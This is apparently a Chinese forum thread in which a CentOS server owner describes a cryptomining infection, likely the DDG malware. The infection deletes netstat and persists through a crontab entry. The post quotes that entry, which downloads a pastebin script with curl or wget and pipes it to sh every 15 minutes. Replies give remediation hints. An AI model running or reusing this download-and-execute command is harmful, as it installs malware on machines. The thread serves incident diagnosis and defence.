今天一觉起来，被报告说有台 CentOS7.5 速度变的很卡。上去一看，没发现 CPU，内存占用有什么很异常的地方，随手敲 netstat -ntlp 准备看看端口占用是不是由异常，结果出现提示：-bash: /usr/bin/netstat: No such file or directory。啊？什么鬼。再一检查 /usr/bin/netstat 文件不存在，我还以为是被不小心删掉了，不管，yum reinstall net-tools 重装网络套件，结果这一装就露出马脚了，/usr/bin/netstat 文件在刚装好的时候是可以用的，几分钟之内，就不翼而飞了，反复几次后，我就明白有什么程序把它给自动删掉了。随后进一步检查发现，
crontab -l 查定时任务发现这样一行代码：绝对不是我设置的
*/15 * * * * (curl -fsSL https://pastebin.com/raw/sByq0rym||wget -q -O- https://pastebin.com/raw/sByq0rym)|sh
打开这个网址发现得到的是一串明显被加密过的字符串，无法进一步排查。删除这个信息，几分钟内会被重新添加。

现在，用 netstat -ntlp 查不出有异常端口，但是我个人怀疑 netstat 很可能已被某种手段屏蔽，证据就是它看不到占用 80 端口的 Nginx （我确定 Nginx 仍然在工作）的 PID(显示为 - )，lsof -i:80 同样失效，我猜测黑客(木马)是打算使用 80 端口的，但是 80 端口跑着 Nginx 导致没成功。机器上的 /usr/bin/netstat 每隔几分钟就被删除，计划任务里始终有那条自动执行请求，我删掉等一会就会自动添加。ps -ef 查不出有异常进程，CPU 和内存均无特别异常，就是系统响应速度慢。我该咋办，除了备份数据重装系统没办法了吗？头一次这么嚣张的 Linux 入侵
100%不被黑的方法，很简单，关机。“你埋在地里越深越安全”——非知名 985 学校自以为比较 dior 的年轻副教授。

看着像是 ddg，ddg 出了清除工具，github 上有

基本都是挖矿软件了

脚本最后几句的注释很有意思。
you crack my program, please don't reveal too much code online.Many hacker boys have copied my kworkerds code,more systems are being attacked.(Especially libioset)
used to want a secure network,social change of humanity,but I really don't like being bad hacker.
data is safe,only mining

所以说你们要用 VPC 网络安全设置，这样可以限定哪些端口可以访问，比如 redis 弱口令问题就解决了……

https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247484556&idx=1&sn=b626b05727ae929ac03f2115ad2665fe&chksm=fd7af80aca0d711ce70341d504013e9b815eebfc22bf2e6db0cfc4c1107031d3586c875346b3&mpshare=1&scene=1&srcid=0223bmQM3fF4n03C7NkHlFuj&key=3fbd0ceb9aa7d609cdce43d9b0a79fa9b4ab050112de843739f6ac1e0b36e7ab8cd9c81043eb34e4e40608818aea3504717f5987bd19824169843bc4cc46fd2c9c2cdf286834b0c7652c825fd85cf47d&ascene=1&uin=MjM0MTQ3MDYyMg%3D%3D&devicetype=Windows+10&version=62060720&lang=zh_CN&pass_ticket=DYxg5%2FI3mFRQf10DIyaXtQlL2jz%2BFfz54Zn7%2FxStuCnsRJI7myPRLOQHhHPRiN81